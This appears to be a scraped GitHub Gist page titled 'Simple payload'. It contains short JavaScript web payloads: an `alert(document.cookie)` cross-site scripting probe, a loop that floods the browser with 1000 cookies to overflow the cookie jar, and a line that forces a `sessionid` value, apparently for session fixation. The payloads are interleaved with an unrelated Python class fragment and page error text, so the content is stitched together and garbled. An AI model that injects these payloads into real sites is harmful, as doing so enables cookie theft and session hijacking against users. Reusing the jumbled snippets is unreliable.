Skip to content

Instantly share code, notes, and snippets.

Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
circle {fill: orange }
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@LaRevoltage
LaRevoltage / test.js
Created December 16, 2022 22:35
Simple payload
alert(document.cookie);
class Auto:
auto_count = 0
user_car = []
cars = []
check_exist = False
def __init__(self, model,year, price):
self.model = model
self.year = year
self.price = price
Auto.auto_count += 1
for (let i=0;i<1000;i++) {
document.cookie = "cookie"+i+"=overflow";
}
document.cookie = "sessionid=222"
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.